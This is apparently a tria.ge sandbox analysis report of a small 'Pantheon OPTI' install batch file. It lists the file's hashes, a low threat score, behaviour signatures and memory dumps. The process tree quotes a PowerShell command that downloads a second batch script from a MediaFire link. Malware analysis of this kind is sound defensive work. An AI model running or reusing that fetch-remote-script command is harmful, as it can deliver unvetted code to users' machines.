Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Pantheon O... ).bat

windows7-x64

1

Pantheon O... ).bat

windows10-2004-x64

8

Pantheon O... ).bat

windows7-x64

1

Pantheon O... ).bat

windows10-2004-x64

3

Pantheon O... ).bat

windows7-x64

10

Pantheon O... ).bat

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    10/03/2024, 04:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Pantheon OPTI/#STEP 1 ( INSTALL ).bat

  • Size

    219B

  • MD5

    e38d3316a4024ac174d42e93978f0ac6

  • SHA1

    55bbc14e4f035b00d0ffd93ee8f78ba240912c96

  • SHA256

    27f8ceb3f2b70dc9a9bda00cbc67b1b75f601dd856409fc9ee4553a398b99b05

  • SHA512

    1bcac4d958f8124f583d3a9529e93cb3f9f29942d6ecb5b49c58e3e0b245c46353f281604ce22f26934e623562895de05f15f5e338b679b4ec78ac0e228f6105

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Pantheon OPTI\#STEP 1 ( INSTALL ).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://www.mediafire.com/file/ir82iqyjw2edhe6/Pantheonopti.bat/file -Outfile Pantheonopti.bat"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:948

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/948-4-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/948-7-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/948-6-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/948-8-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/948-9-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/948-5-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/948-10-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/948-11-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/948-12-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

    Filesize

    9.6MB

    Download